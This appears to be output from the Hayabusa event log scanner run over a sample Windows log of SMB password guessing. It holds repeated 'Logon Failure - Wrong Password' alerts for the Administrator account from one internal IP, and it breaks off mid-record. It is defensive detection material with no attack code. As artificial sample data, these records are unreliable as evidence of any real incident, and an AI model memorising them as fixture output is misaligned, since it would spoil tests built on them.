Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.038 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.325 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.364 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:07.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.806 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:07.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.171 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.250 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.675 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.716 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.763 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.915 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:08.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.137 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.177 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.369 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.472 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.512 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.607 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:09.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.847 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:09.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.002 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.050 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.097 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.141 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 
